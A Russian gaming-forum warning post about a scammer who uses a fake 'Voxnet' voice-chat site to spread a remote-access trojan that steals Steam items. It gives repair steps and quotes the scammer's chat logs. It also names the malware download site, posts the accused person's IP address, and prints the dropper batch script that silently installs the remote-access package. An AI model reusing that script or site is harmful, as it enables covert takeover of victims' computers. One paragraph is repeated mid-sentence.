Внимание! Жесткая кидала.
Прошу не переносить тему вдругую и желательно эту тему закрепить.
Я пишу со второго акка, я не хотел этого ну ладно, потому что очень жестокая кидала, мой прошлый акк получил бан - kroL
Как вас предупредить я не знал.
Вор - Nobility
Его ип - 88.85.180.239
Как он кидает?
Ищет игроков, которые ищут тиму. В списке или в разделе специальном на этом форуме. Его жертва любой игрок, он представляется как капитан команды и говорит, что ЕГО КОМАНДА НЕ ИСПОЛЬЗУЕТ СКАЙП, А ИСПОЛЬЗУЕТ ПРОГРАММУ ТИПА СКАЙПА. Ну я сказал ок, гоу. Он дал красивый сайт, прям как официальный, ну я скачал прогу, она не запускается, я ему об этом сказал, но он сказал подожди через 10 минут в скайпе позвоню. Через 10 минут пишет, что уже не нужен человек в тиму. Этот файл был жестокий троян вирус, который убивает всю систему. Компьютер начал сам перезагружаться, создался новый профиль в виндовсе Windown Help с паролем. Пропал весь экран и пуск, открыта была папка только мой компьютер. Каспер нашел около 10 вирус и их пофиксил, но этот гад вирус, залез в реестр и поменял пути. Пришлось лазать, гуглить с иных средств выхода в интеренет и искать решение. Все сделал, восстановил, заняло где-то часов 6 на восстановление. Так же он украл все пароли от стима и т.д. В стиме он менял пароль, а просто украл все вещи, ценные вещи.
Просто предупреждаю не ведитесь это, может вам придется и винду перестанавливать... и всех паролей лишитесь. Все поменял, увидел, что пропал таймбрикер и все рарки...
Из скайпа:
Цитата:
[29.07.2013 16:56:14] Nobility: http://voxnet.tk/ (не качайте оттуда ничего, сайт с вирусом, это сайт похож на офф сайт проги)
[29.07.2013 16:56:57] Nobility: Как зайдешь, сверху будет "Подключиться к..."
[29.07.2013 16:56:59] Nobility: ID: 329901
[29.07.2013 16:57:12] Nobility: Пароль: zgnagtvzd
Нажмите, чтобы раскрыть...
Скрины айпи:
Трейд с ним:
Вот что творит вирус в компьютером:
Скриншот сайта:
Что делать, если я попался на его уловки?
1. Не паниковать, не сносить виндовс, желательно выдернуть провод интеренета сразу же.
2. Включить антивирус на проверку.
3. У вас будет все время открываться папка "Моя компьтютер"
4. В строчке поиска пишите cmd
5. Открывайте .exe файл cmd
6. Вписать в строчку regedit
7. В ветке HKEY_local_machine\software\microsoft\Windows NT\CurrentVersion\Winlogon
Такие параметры?:
Userinit -- C:\WINDOWS\system32\userinit.exe
shell -- explorer.exe
У меня были вот такие значения: user1141414rinit.exe и expl3131orer.exe
8. Добавить новую задачу в диспечере задач explorer.exe
9. Перезагрузить компьтютер
10. ИНТЕРЕСНОЕ:
На компьютер скачивается архив Sender.rar. Архив сам распаковывается и живет. Удалите его ОБЯЗАТЕЛЬНО!!! Обычно этот архив там же где и был файл с вирусом.
А так же вот еще был подобный случай:
Цитата:
[20:03:17] Антон: чем обязан
[20:32:23] Nobility: Привет, команду ищешь?
[20:32:41] Антон: привет да есть немного)
[20:32:52] Nobility: Сыграть сейчас сможешь?
[20:33:01] Антон: да какие вопросы
[20:33:59] Nobility: Слушай, весь стак сидит в Voxnet'e, у тебя есть?
[20:34:10] Антон: нет
[20:34:17] Nobility: Сможешь скачать?
[20:34:48] Nobility: ?
[20:34:55] Антон: да секунду
[20:35:01] Nobility: Вот линк http://voxnet.tk/
[20:35:58] Антон: https://dota2.ru/foru...__fromsearch__1
[20:36:03] Антон: удачи
Нажмите, чтобы раскрыть...
О вирусе:
Я начал разбирать .exe файл этого тупого кидалы. Оказалось, что он использует ваш компьютер пока у вас черный экран!!! Черный экран сбит только у нас, так как в реестре сбиты все пути. По этому мы ничего не видим. В это время он лазает по нашему компьтютеру, и взламывает стимы, точней, в почте который вы вошли и в стиме везде везде, пытается украсть быстрее пока вы не восстановили это.
В этот .exe файл встроен http://rmansys.ru/su...ws/release_5-0/
Цитата:
RMS Удаленный доступ — это продукт для управления удаленным рабочим столом, предоставляющий простой и безопасный доступ к PC в любой точке земного шара. RMS позволяет просматривать удаленный экран и управлять клавиатурой и мышью так, как будто удаленный компьютер находится непосредственно перед вами.
Нажмите, чтобы раскрыть...
А так же- http://www.raidcall.com/v7/index.html
Дальше он в баднике сделал такой скрипт выполнение команд, что после этого запускался программа удалёнки:
Цитата:
@chcp 1251
@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn
REBOOT=ReallySuppress
@MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn
REBOOT=ReallySuppress
@ping 127.0.0.1
@MsiExec /I "Voxnet.msi" /qn
Нажмите, чтобы раскрыть...
Что это я не знаю, надо гуглить. Так что ребята, осторожно... Дальше буду рыться и искать еще что есть...
@@@@@@@@@@
Дополнение
ШОК!!!!!!!!!!!!!!
Сегодня в диспетчере появился странный процесс, странной программы. Я начал ее искать, это программа была спрятана в папке Windows Syns. И создана папка во время взлома компа. КИДАЛА МОЖЕТ УПРАВЛЯТЬ ВАШИХ КОМПОМ В ЛЮБОЕ ВРЕМЯ.
Он ко мне сегодня заходил на компьютер в
2013-07-31 12:09:46:072
96
Internet-ID: Connection established
ID: S-BCF76343-E60E-4EE4; Port: 563
И вчера заходил, а так пытался зайти когда компьютер был выключен. Ему писалась ошибка. При удаление программы, ОНА ПРОСИТ ОБНОВИТЬ СТИМ. ШТО??? Странно очень, я вышел из стима. Начал искать в Панеле управление это программу. НЕТУ. В реестре копался час-два. Нашел ее корни, удалил. Искал все процессы. Удалил. Все очень сложно и запутано. Работа как сказать, профи. При том он тырит все, что есть на компе, просто заходит и обменивается в стиме. л из стима. Начал искать в Панеле управление это программу. НЕТУ. В реестре копался час-два. Нашел ее корни, удалил. Искал все процессы. Удалил. Все очень сложно и запутано. Работа как сказать, профи. При том он тырит все, что есть на компе, просто заходит и обменивается в стиме. Я Я лучше рекомандую, сразу винду сносить, комп зарежен этим полностью. Эту программу сложно удалить. Так как она все запускает этот процесс через который он смотрит, что творится с компьютером. ---
Эта прога запускается как служба компьютера, тоесть обязательно, сама включается, он делает, что хочет.
Если ее просто удалить, она будет сама запускаться, САМА!!!, надо отключить автозапуск.
Логи:

Вход сегодня:

Прога:

Я хочу написать заявление в полицию. Как правильно написать заявление?
Спасибо большое моему другу Костяну. Помог, большую часть сделал он.!
Админы что нибудь сделайте с ним...Точно 100 человек попались или больше, страшно теперь!!!
КАСПЕРСКИЙ не видит вирус этот!!!
Не ведитесь на него!!! УДАЧИ!